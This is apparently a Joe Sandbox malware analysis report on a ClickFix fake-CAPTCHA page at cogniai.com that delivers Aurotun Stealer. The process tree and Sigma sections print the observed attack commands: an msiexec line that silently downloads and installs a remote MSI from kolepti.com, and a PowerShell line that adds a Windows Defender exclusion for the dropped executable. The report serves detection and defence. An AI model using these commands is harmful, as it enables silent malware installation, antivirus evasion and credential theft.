Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HTTPS://cogniai.com

Overview

General Information

Sample URL:HTTPS://cogniai.com
Analysis ID:1701089
Infos:

Detection

Aurotun Stealer, CAPTCHA Scam ClickFix, MicroClip
Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: msiexec download and execute
Suricata IDS alerts for network traffic
Yara detected Aurotun Stealer
Yara detected CAPTCHA Scam ClickFix
Yara detected MicroClip
Adds a directory exclusion to Windows Defender
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
HTML page adds supicious text to clipboard
HTML page contains obfuscated javascript
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: MsiExec Web Install
Sigma detected: Msiexec Initiated Connection
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses cacls to modify the permissions of files
Yara signature match

Classification

Process Tree

  • System is w11x64_office
  • chrome.exe (PID: 5196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
    • chrome.exe (PID: 2404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,5440256914354337086,2860174452977065864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2172 /prefetch:11 MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
  • chrome.exe (PID: 6232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "HTTPS://cogniai.com" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
  • appidpolicyconverter.exe (PID: 6840 cmdline: "C:\Windows\system32\appidpolicyconverter.exe" MD5: 6567D9CF2545FAAC60974D9D682700D4)
    • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
  • cmd.exe (PID: 3632 cmdline: cmd /K msiexec /i https://kolepti.com/flare.msi /qn MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)
    • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
    • msiexec.exe (PID: 6132 cmdline: msiexec /i https://kolepti.com/flare.msi /qn MD5: FE653E9A818C22D7E744320F65A91C09)
  • msiexec.exe (PID: 3180 cmdline: C:\Windows\system32\msiexec.exe /V MD5: C0D3BDDE74C1EC82F75681D4D5ED44C8)
    • msiexec.exe (PID: 6816 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BF62B73C00C1B0D08C68F4BFD7AE82B4 MD5: FE653E9A818C22D7E744320F65A91C09)
      • icacls.exe (PID: 7004 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: DF132308B964322137C3AA6CD2705D24)
        • conhost.exe (PID: 3260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
      • expand.exe (PID: 7044 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 63860F134FE4705269CE653A673DBD88)
        • conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
      • 0xBKHFISYHPX.exe (PID: 3844 cmdline: "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe" MD5: CD05164818C9D8380B58C845DD2BB20E)
        • powershell.exe (PID: 3476 cmdline: powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe" MD5: 9D8E30DAF21108092D5980C931876B7E)
          • conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
        • cmd.exe (PID: 4352 cmdline: C:\Windows\system32\cmd.exe MD5: 428CEC6B0034E0F183EB5BAE887BE480)
  • Hueta.exe (PID: 4916 cmdline: "C:\Windows\system32\Hueta.exe" MD5: 0DE3703CFCBA4D443154324202F37212)
  • cleanup

AI Reasoning

No reasoning have been found

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1919315659.0000016687610000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x2db63:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AurotunStealerYara detected Aurotun StealerJoe Security
    00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MicroClipYara detected MicroClipJoe Security
      0000001C.00000002.1636324703.0000020D26D62000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AurotunStealerYara detected Aurotun StealerJoe Security
        Process Memory Space: 0xBKHFISYHPX.exe PID: 3844JoeSecurity_AurotunStealerYara detected Aurotun StealerJoe Security
          Click to see the 2 entries

          HTML

          SourceRuleDescriptionAuthorStrings
          1.21.o.script.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
            1.1.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

              Sigma Signatures

              Spreading

              barindex
              Sigma detected: msiexec download and execute
              Source: Process startedAuthor: Joe Security: Data: Command: cmd /K msiexec /i https://kolepti.com/flare.msi /qn, CommandLine: cmd /K msiexec /i https://kolepti.com/flare.msi /qn, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3076, ProcessCommandLine: cmd /K msiexec /i https://kolepti.com/flare.msi /qn, ProcessId: 3632, ProcessName: cmd.exe

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe", CommandLine: powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe, ParentProcessId: 3844, ParentProcessName: 0xBKHFISYHPX.exe, ProcessCommandLine: powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe", ProcessId: 3476, ProcessName: powershell.exe
              Sigma detected: MsiExec Web Install
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /K msiexec /i https://kolepti.com/flare.msi /qn, CommandLine: cmd /K msiexec /i https://kolepti.com/flare.msi /qn, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3076, ProcessCommandLine: cmd /K msiexec /i https://kolepti.com/flare.msi /qn, ProcessId: 3632, ProcessName: cmd.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.148.228, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 3180, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 49723
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe", CommandLine: powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe, ParentProcessId: 3844, ParentProcessName: 0xBKHFISYHPX.exe, ProcessCommandLine: powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe", ProcessId: 3476, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe", CommandLine: powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe, ParentProcessId: 3844, ParentProcessName: 0xBKHFISYHPX.exe, ProcessCommandLine: powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe", ProcessId: 3476, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-05-28T23:04:27.428022+020020616392Possible Social Engineering Attempted192.168.2.24595731.1.1.153UDP
              2025-05-28T23:04:27.428229+020020616392Possible Social Engineering Attempted192.168.2.24515441.1.1.153UDP
              2025-05-28T23:04:32.615910+020020616392Possible Social Engineering Attempted192.168.2.24517961.1.1.153UDP
              2025-05-28T23:04:32.616089+020020616392Possible Social Engineering Attempted192.168.2.24572741.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-05-28T23:04:28.396180+020020616462Possible Social Engineering Attempted192.168.2.2449696104.21.68.46443TCP
              2025-05-28T23:04:33.844304+020020616462Possible Social Engineering Attempted192.168.2.2449710172.67.186.167443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-05-28T23:05:10.803632+020020612001A Network Trojan was detected192.168.2.244972491.200.14.697712TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_2e64a555-3

              Phishing

              barindex
              Yara detected CAPTCHA Scam ClickFix
              Source: Yara matchFile source: 1.21.o.script.csv, type: HTML
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              HTML page contains obfuscated javascript
              Source: https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5nHTTP Parser: (function(_0x44a4fe,_0x26438d){function _0xc2516c(_0x4d2ab2,_0x1c424f,_0x48d53b,_0x51657b,_0x5d6b73
              Source: https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5nHTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49731 version: TLS 1.2
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: `\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb&l source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 4\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb,lg source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642B source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 2\??\C:\Users\user\AppData\Local\Temp\Win11Debloatrod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: winload_prod.pdb3d8bbwe source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\Local State source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: chrome.exe, 00000000.00000002.2039759855.00000166927ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: h\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\Local Statef source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 8\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb)l` source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 9C:\Users\user\AppData\Local\Temp\Win11Debloat\d_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: :\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb=l source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642t source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: winload_prod.pdb source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\cal State\EBWebView source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State^ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb0447 source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbeData source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\Local State source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: chrome.exe, 00000000.00000002.2039759855.00000166927ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb1.0-7e3544113374bc2769af5f67e125ab81de1b4b64c07fe68e2a7bc03646c85dfc source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb#lj source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: d_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21G source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: v\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbe source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642ate\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: >\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbRl} source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
